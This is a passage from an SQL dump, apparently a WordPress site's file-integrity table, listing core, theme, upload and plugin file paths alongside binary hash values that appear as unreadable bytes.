','',0,'?'),('�}�,��؈<���','wp-content/uploads/2019/08/renting2-768x432.jpg',0,'��9�[�m��o*!e>','��9�[�m��o*!e>','&�S�O��<���t�[yvyB�G�����','',0,'?'),('��g�!��ٺ�!���*�','wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-server-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-$lW�:����c�=','�z\0D4S�И�!�V�a�g,���������','',0,'?'),('��=��-Xԍn{]�pf','wp-includes/js/wp-embed-template.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lq3UN�:�9�:^E��','3R�X�o��}Q��P��b�������J��','',0,'?'),('��we�i!<��s�y\n','wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h8�FK�3Eq�s����','�0�T���E�Va~\'55h4��o՞�{Mɱ��\'','',0,'?'),('�����w6Uu%��','wp-includes/js/dist/vendor/wp-polyfill-element-closest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<j��� �<Yt�#�&','yNOBӻ�]&6�M�-��J��.�����:.�{','',0,'?'),('����S�D��~��p�v','wp-content/plugins/wp-cerber/assets/bn3ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�\n`ehG�����}�','Ul,��/��g����Qg�\'��� �I�&','',0,'?'),('���fSu�B�ͥ?^yO','wp-admin/css/themes.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�%=@+��{)�|','�$%N�.%Mx�����W}�X�)2W ','',0,'?'),('�����:ww������','wp-content/uploads/2019/08/rent-768x512.jpg',0,'y�(c3b�g��4��','y�(c3b�g��4��','(Щ��X�XNp\0G���c�B�Rի\0����j*','',0,'?'),('����{^��W����C�','wp-admin/css/colors/ocean/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e2-�2�0{`�X�','3�!�VG��א��A3\\K���a�����+','',0,'?'),('���� ��*Q��^','wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c\'[�g`.Ƿ{k','�{K��.(��\Z�\0����<��!rv�+=8���','',0,'?'),('��3T,�M�� nÀ�4�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/video/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@ۓb�����hX�','�ڊ�j�9�y���v\n�oC/�`��ny','',0,'?'),('���-�]�\r�~(#�','wp-content/plugins/wordpress-seo/admin/class-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T#nEM��>k���^','�as��#32WI���D/�k \"\'�v��','',0,'?'),('��b��֏�� �$;�h','wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D�Vr�|HH�','���Ҵ?5��n���P6ֆ�>�{\0-x��e','',0,'?'),('��Ç���JV�W�]I�','wp-includes/blocks/table/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��Ch������2h','���� ������E�\0?�}!9غ�\'e��C}i','',0,'?'),('��ə]��{���j�Y�','wp-content/uploads/2021/08/home-improvements.jpg',0,'����y�q��>�oGn','����y�q��>�oGn','N�L�k������.��!�(K����!f�8���','',0,'?'),('���i��6̰�S�','wp-content/plugins/wordpress-seo/src/conditionals/open-graph-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^$ڼ�]e�\nS+^�','EHh�>��{�#q?���{\Z�Sv�D�A�WB�','',0,'?'),('�هi`\0�y+�Cb','wp-content/plugins/wordpress-seo/src/deprecated/admin/recalculate/class-recalculate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���l,q�_��','�Y]�76oJ�R�E�ry�:�+�n�����','',0,'?'),('��$[��tCŤIw','wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W� ��,��~�r�','L>���e������h�\rF$�C�V������7�','',0,'?'),('�m5��u����1}�','wp-includes/css/dist/block-library/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����WdU \ZXSn�p','�z1!\"f��*-ST N�.�(�\0Z���\rd��','',0,'?'),('��&B�5V�AUU,��','wp-includes/class-wp-http-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`=Y=��3���p*���','�n�<o��%�/�U\"y�\"���)�����B�','',0,'?'),('�%J���{aTx��2','wp-content/plugins/wordpress-seo/src/integrations/blocks/abstract-dynamic-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�6b�y��Ý�ݐ','��\n�$\n^����U�#�|�}��X��E�� ','',0,'?'),('�*팾�7�C�N�','wp-content/plugins/wordpress-seo/js/dist/configuration-wizard-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jx���eq��ZJ�rH�{','W����ŠN��`<\rl�@L6\ZU��r%~','',0,'?'),('�1A��bȱ��8��EN','wp-includes/blocks/group/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��B� ���?�w\"','��L�ֿ�)�J�ןͬL��ѴC [�','',0,'?'),('�X%��[Q{����','wp-content/plugins/wordpress-seo/js/dist/languages/hu-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�R�v�SB\'%v�`','�H��RW~M=s7�0\n��V#.�ϴ����j��','',0,'?'),('�_f��;w�a��ځ�','wp-includes/js/tinymce/skins/wordpress/images/gallery.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_���Pw��PU�4','<W~���ض��+�hN��9��1�_�3�w�s','',0,'?'),('�g�ӨH7\ng��3L','wp-content/themes/twentytwenty/assets/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ln��>�+�M��,','!�7U�`���^��:��8��o�_: � ','',0,'?'),('�u��<e�x��@ֈ>','wp-includes/js/underscore.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=N��9�ΡH�.^�','{#�n�ѐXEx˰���&�|�\nk%��}xjM-ND','',0,'?'),('�zub�d��3��_T�?','wp-content/plugins/wp-cerber/cerber-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�蔺���/�Oޕo�M','}�6��Z��;�4M��vՊo�1�a��','',0,'?'),('���])T�����N25F�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GR˗c��?qt�','֝Rz5B�,��nɲ�����\nHoڨ��|','',0,'?'),('��q?%�rp��0�7�q','wp-admin/css/colors/coffee/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J���x�\'ÂF2[&','E��pp;/�\ZO��eG����ql�&oC�9','',0,'?'),('�����C� #a��S�[','wp-includes/sodium_compat/lib/stream-xchacha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\ZX�x�3)�','m�io�j�6XP�J��y��vx���ܧ','',0,'?'),('����t�:���Z\0�','wp-content/plugins/wordpress-seo/admin/import/class-import-detector.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�r����\r�&','Hvx�i�%��Y.��5� �_���~T�K\r�.','',0,'?'),('�����,/r�]��1S','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log-cron-job.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��-[����S�_عQ�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1:��!�G~�q�ic','^�DCguPT!>����W��\Z���k�~_5\n8','',0,'?'),('��;��K�P[�լ���','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u$���N����\r6','��Y0��hb_�%��/��_1�$Z�~xψ','',0,'?'),('��zvo:���B%���','wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�h���%u-C�\0�','\"Y¤&6HU�^��\'�$���=_;>����','',0,'?'),('����x�Й�)DC��<','wp-includes/js/customize-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�~G~�Ԟ�','�h�3XVx�p��T��OSSfb��\r�E捵�','',0,'?'),('�\nO�l�dx�Q~mIgB','wp-content/uploads/2019/08/renewable-energy-768x432.jpg',0,'��_��G����b_�X1','��_��G����b_�X1','���:I2�X�?�q�F�l>S�[O��!��u','',0,'?'),('�~����U�\"�&��','wp-includes/images/wpicons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�V�o�$��Of~7','�]کA=�ђ�%�q�%aM�����B�U�p','',0,'?'),('�t�~������*�ֆ','wp-includes/blocks/page-list/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ss��*=�\\�(\Z��','�J ���&�eoZ��� $�Jȝgt*6�=�0T','',0,'?'),('�_��S�ަ�:{j�}','wp-content/plugins/wp-cerber/assets/flags/do.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n���*{\0�4��sV','\n�/�H��Ҿ/���\\����-ܧ��Rx�','',0,'?'),('��W2��D��G�7�V','wp-admin/css/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_Z���+��g�m)','Ϙ������8�.��\n��rC2=@��v U','',0,'?'),('��M��~\n�T|�','wp-includes/js/mediaelement/wp-mediaelement.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꕂv��EK�?\r�~_','!?�[��_���r��=&�\n�-%!y��\r�','',0,'?'),('�?z^��3n��1���','wp-content/plugins/wordpress-seo/languages/wordpress-seo-ro_RO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�d�\nx�یrl��','E��$���!���\rs�e4�1c�x\'�!�-`','',0,'?'),('�H駖�P�at �V�\'e','wp-content/plugins/redirection/redirection-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','۫A�lKX��}i�%F','�^t��x�3f���2ZH�QA��H�����','',0,'?'),('�V[s)R��@3,®�','wp-content/plugins/redirection/locale/json/redirection-es_ES.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z��A9>_\Z.m','�GV�S$M_�Kt,[�tr̛5#��\'��{��e','',0,'?'),('�Vb(kt�W\"�6(;ƴ�','wp-admin/includes/class-wp-media-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B:�#�Fx�؊��','s3a�5����������)�ටb��$\0w�','',0,'?'),('�iȜ�1��\0���8','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S;h8�^��g�R','��m�fʬ�����S�XT����8��A�-�g�','',0,'?'),('�i��ͯV�~�x�x�Μ','wp-content/plugins/wordpress-seo/js/dist/languages/pl-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϴ�����Ef$5��λ','�`�f�Ve��=��j�k��]���\"Oe�K��W\0','',0,'?'),('�tfF �r{�܇�_I�x','wp-includes/SimplePie/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��dGzC\0��u\r��','a���,�\"���Ɣ_*{�Z��m���ɛ���','',0,'?'),('�|]�D��\Z.�E','wp-content/plugins/wordfence/views/scanner/scan-progress-element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�ꫯ�y�5�pc','0(��5D�=U��Ԕ~���ڈI\")�7h','',0,'?'),('����ԵB��H����q','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-ro_RO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��\Z��c5���,�','?�3J%Q��sP\"�RW��z�����w=5�','',0,'?'),('���N-�q���\0��','wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������\r�)�oF','�T�%�bu�I�|��\\�/��+7^f\\�RIۄ','',0,'?'),('������2L(�~���','wp-content/languages/en_GB-ca28138671823450e87dfd354f7afc6b.json',0,'�T#�����A�]','�T#�����A�]','%����=0rJ����;o�-�nJ3�.C�@�wL_u','',0,'?'),('�Ŏ��O�NJ�`','wp-content/plugins/all-in-one-wp-security-and-firewall/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��v��+�k�N�','wp-content/plugins/wordpress-seo/src/conditionals/front-end-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0��xȭ�i��3c','AQ�������O�l��b��f���J����','',0,'?'),('�\n�ot}l�!E�`I','wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\0�\\��n�+��Ö','ƌ�%{�cUkw��\r��^p%���$L�`��','',0,'?'),('��߲;��0����','wp-includes/feed-rss2-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��6<�v�z�L','�3۸�kH��?�1B�g#~<X��gbe�','',0,'?'),('������/�n����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r]��^g��\Z�/]T��','�y�涩�x���Ƞa}���s矛���+�br)','',0,'?'),('��\\Om��\r�>u�Ff','wp-content/plugins/wordpress-seo/js/dist/languages/de-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T\\\Zq�����\01��W�','D�n��!ݎ�ʥhb�܃�p+T\nmٍ�','',0,'?'),('�!�-LHv�)��n��#','wp-includes/https-detection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Խ��Kܑ�+�q�_','�L)��5(-�E�=PW���\0�\n���#�n9 ','',0,'?'),('�(�`hqQ`~�X��','wp-content/plugins/redirection/matches/login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SS:?l���]�\0��h','���g��FP-�Qlk��������T7Ŋ�','',0,'?'),('�7�>�=e��m^�Il�','wp-content/uploads/2019/08/renting2-150x150.jpg',0,'�3J���$��>���A3','�3J���$��>���A3','��:��}�w�y1���&s��~���Z�!�8�','',0,'?'),('�87�>�/�NTZ��y�v','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/km.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0��ʇS����X�x','ᘈ��@\Z>�Wwxc������ ��xv>���m','',0,'?'),('�<��g�=�C�״qD','wp-includes/customize/class-wp-customize-themes-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uZ���7ѳ����U','aMk��M.�ݚ�fJ>����{�V���>v2U','',0,'?'),('�PC<�� ���vn�R8','wp-content/plugins/wordfence/images/tools.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@cI�����','��Y��=������RB�) ~����ܖݟr','',0,'?'),('�_�x�G�g�o��','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-es_AR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HJ���@�p;�ҒHI.�','Y5��G�pi�1J��S5鑀�t�^Ǝ�hr��','',0,'?'),('�m�CB.ե�>F_�#','wp-content/themes/twentynineteen/sass/media/_galleries.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�md��~����','�6�!1oAu�Eo���Fw�9\n4\0�\\%wM�\r�g','',0,'?'),('�v>�8��\'��T6���X','wp-includes/js/jquery/ui/progressbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��=i�D��_zy�\r3','��_n�����)S����6�3+n�3���','',0,'?'),('��,��M��;v��','wp-content/plugins/wordfence/views/dashboard/options-group-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+:�C�����g�Q','(�#���><���\"(\n��\'K������','',0,'?'),('��3�T.^�ƙ<���','wp-mail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��p��C�!�Ԑ,','�����\0�\nIP�t}3RΘ/#����A�','',0,'?'),('���:T�L�5�EF�Vc','wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�v_�`���n�/T','�P��s\'\n�B��KM$꼓rfy6yݵ[���e','',0,'?'),('��\'��@S �D���','wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��?�q>�@���p','\0{aq�(w�!Iz�}+�l�x/I0�9|1%�����','',0,'?'),('���4������&�~','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-id_ID.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��#�\nɗ��,M�','HuCE��x%|��X��h����5��ml<]͚��','',0,'?'),('���\09X�s�e�!�M�','wp-content/plugins/wordpress-seo/src/presenters/twitter/card-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l��P]��V?6ɸx','u��fFVMB�ӓ\Z��\\�~������a�c�','',0,'?'),('����?����7�B�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǜ�}ɠAxj,Әܷ','3�������j��@�A�1�)Σ�(^]CcD','',0,'?'),('��K���OȖ9�3|<�','wp-admin/maint/repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ޙ���~��M♸�','IoT�]��j�J��~�ď�7bn!M|��!F��','',0,'?'),('��½�ց%p�g�=','wp-content/plugins/wordfence/js/knockout-3.5.1.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��aUHw˲I��O','����&�$�z��;o,��4�ca����','',0,'?'),('�ߪ6��e?�u���','wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-theme-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����*�A�mAC�:@','}c����m��e�>UP1�,>+�<��^H�\Z��','',0,'?'),('��M��{x�J�H��','wp-includes/blocks/pullquote/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�PRPp��iy+T���','7`��Q�yg�7s�%\'_��dLڿ���P��','',0,'?'),('��`~L�C�rN��wF','wp-content/languages/themes/twentytwentyone-en_GB.po',0,'}n*cqe���x�<i�','}n*cqe���x�<i�','�P�F\0z�Ӌ��%/fi���p���Fy^�','',0,'?'),('��q�oT�;h^̀','wp-content/plugins/redirection/database/schema/232.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�W{�+N�s��-�','�m�k��ה\0�X��˝J�eO�L�vT��','',0,'?'),('��I���.$U0]\'�S_','wp-admin/includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O;I��U��=��w','@U�=�:3�HGBkՂ���D�q5���׆�)�','',0,'?'),('��ꑉ}�Oa�T�TN.','wp-includes/blocks/search/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���� �N+~/�7z','�,�G*����?a�~�q�<�2E9�fa���=','',0,'?'),('��+D�FܿTZ[H7','wp-admin/images/post-formats-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�l��H\\�������','e�t���w|W�{x�y%K:��QE7������','',0,'?'),('�\Z�[�M��[�\r�','wp-includes/blocks/columns/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f~^��d�J�ꨡ���','�<@��K�W��q%4b�~�$�}!�bg���y�2','',0,'?'),('�)Sl�W)�l�h�J\'.','wp-content/plugins/wp-cerber/assets/flags/me.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{H`C��~���^8�X','��&�P�-urk�P�����\"~aZ��ޢ�','',0,'?'),('�2�>�[{�Lj�0�s�','wp-content/plugins/wp-cerber/assets/flags/ai.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�]��à�a�{��','*[3#�h���\"M�@]l�Ή05>И��ۖf','',0,'?'),('�<�3�v��&F','wp-content/plugins/wordfence/views/scanner/scan-failed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ŝ*�7��P rx��','�ô�p�`)��28�$iw6�J�g�jnD�j','',0,'?'),('�A?�]\\8�PMT�l','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�B�)c��ae���','�[}���D���\0OV�:~-�\"~mBh\"<�pW�','',0,'?'),('�GV\\z��#���!;��','wp-includes/js/media-audiovideo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�f��E\r�ܷe3','�-��S�?�R8#�V��1@_�����W\r>�^','',0,'?'),('�M��s�;\',���-E','wp-admin/css/dashboard-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�_���bes��?�7�','(t��{AG�X0ur�Ť�\0���G�����','',0,'?'),('�O�r#��T�G��!','wp-includes/js/swfobject.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,�I}p�e~2�q�','?��Lw���.�4M��ՒF�J�>fI�鴆�','',0,'?'),('�l&�*������&','wp-includes/SimplePie/Content/Type/Sniffer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JVP�t>%N����\0','\n��S/��̼#@��%���,�ul��$t���T��','',0,'?'),('�piQ�^�l�u�����J','wp-content/plugins/wordpress-seo/admin/class-plugin-availability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a7�)|�3}�n�[E','�B\\M�w+i���\\���y7�,�\'�-ß��','',0,'?'),('�w�\Z��plUz�Q�','wp-content/plugins/wp-cerber/assets/flags/ly.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�,ʁ���]��r�V','t��\n�jM��l��0�^��f&���`ʃ','',0,'?'),('���$(�g�(���P��/','wp-admin/css/wp-admin-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Q5\'EY�o�0�}�_�','0�|TF����O �.�����.��>��CEj��','',0,'?'),('��5��At߂�m0i�z�','wp-admin/css/themes-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S\Z�Nw�2��%���|','�F��\ZJ7\r��sJ���m��cE\"��p/�&z��N','',0,'?'),('���yx����x4*� ','wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�BP����r�粓\0�','[f���v���AlԻ˄N�A:4QP����� r','',0,'?'),('��H�С���YVhZ�','wp-includes/block-supports/duotone.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�|7�:@f즕','������:��~�K�J2h�B���w�j��%�','',0,'?'),('����92R]�X~�i�','wp-content/plugins/wp-cerber/assets/flags/bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��g��:�uO�c','�{h�s`�W�\\�v���n�OF�\Z�r���J�s','',0,'?'),('���q�K�U�j�','wp-includes/SimplePie/Category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���[�� �ZVG�4&','�<��J�H�v�i� b�4l~�e�F��mj�','',0,'?'),('��M�������b�v}','wp-content/uploads/2019/10/plumbing1-150x150.jpg',0,'bʲ5DP��0�kaZ','bʲ5DP��0�kaZ','�I+JC \Z!��b����)u1�Y%L�60�0w ��','',0,'?'),('��O\n �U��Rb','wp-includes/Requests/Exception/HTTP/304.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�;��P�#S\Z�0|]�c','v��C��� a�\'F�;���z���(eJ��L','',0,'?'),('��;A�3i$��ի~�','wp-content/uploads/smush-621b44bc292d5eadfd21.log',0,'m�nRpއ�s�{��DS','m�nRpއ�s�{��DS','�WM�1�i!koC#��H�͇\0a�C� ���','',0,'?'),('���3cv�N�\"��@�','wp-content/plugins/wordpress-seo/src/generators/schema/breadcrumb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��bY���i�����','�\"q�P�Ӣ��8A�ˇ���o�x����','',0,'?'),('��xƆ�xQ4Z��\0','wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint-statistics.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','衲z�o��<wek��Ta','1�}0���1��۞t\n\\��z��RTD$t�P8�>','',0,'?'),('��-Z���:E�:','wp-admin/js/image-edit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�M��l~%������','\\�%k�����;�,����ay\\�s�A\'','',0,'?'),('���7����Rr�','wp-content/plugins/redirection/locale/json/redirection-de_DE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7Ϙ�I}�|F ��7','粸��ǩ>���3U�[���l�?�Î�0\"z�','',0,'?'),('���|�jX����|�fb','wp-admin/css/login.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[?��r�a�azž�7','��w��z\Z�v?��fG(q�ӗ8\"w�]oV�','',0,'?'),('�*i�8��]�\n4����','wp-content/themes/twentynineteen/print.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0)ݴ�`I4�P?Y$2|\n','��$�eI�8a��*�����\0��D��B�0','',0,'?'),('�<t@�zfj����r�h','wp-content/plugins/wp-cerber/assets/flags/ht.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Wѭ�b;��t�','#{�՞p�.3��T���[�Kj�P�x�=','',0,'?'),('�=v�\"��!1�p��','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-cache-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.�n��8�`u��.','C\0ؗ�1���2���_�]�bf�R�J���','',0,'?'),('�>�G�26�5����b','wp-content/plugins/wordfence/js/wfdropdown.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����rp��c\'\Z�','��SG��s8;�Z�!�זJ�u�1�z?���','',0,'?'),('�MR��l�B�F�u','wp-includes/option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��Q�Gn���ϋ�','X�y�p��;@�F��]=sn|���v�(�L','',0,'?'),('�Y�R3�������!','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���E�\\*�l�K�\'�','=�ZI\Z屴U��\r�+qq��?�Ũ>�bAˡ$','',0,'?'),('�he��-�BJ��_v�','wp-includes/blocks/search/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\Z��V6}r��^���','|dV�X�P7:���L!{Nd.5A�TP��%�$','',0,'?'),('�r�\\�j�����A$�','wp-includes/js/customize-base.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Nf�u�\Z\\A��0o�)','���l��us�o ��n�Gǝ��NU1�`9.�','',0,'?'),('���jc\'5�w\r\\�','wp-content/uploads/2016/11/taupe-kitchen-cabinets-contemporary-with-range-in-island-wine-and-bottle-openers-300x202.jpg',0,'��l�-��3W@�U�f','��l�-��3W@�U�f','i1c�\Z#]P��9��C�C�WaJ�0):�x�yT','',0,'?'),('��犏`bI�\"v4�N�','wp-includes/blocks/cover/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z.Q�9�S�P�{_{O','n� �HB��<��Bn�4�EP�R�9��Ǔ+�b','',0,'?'),('�����\"Sέ`t@','wp-admin/network/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R\n��.o���Ʊ2bw','�A�gp����/�m��,&Rq�f9ey��$=�','',0,'?'),('��K?�r��a#Qh','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ia����Rɞ%x��','���M�� 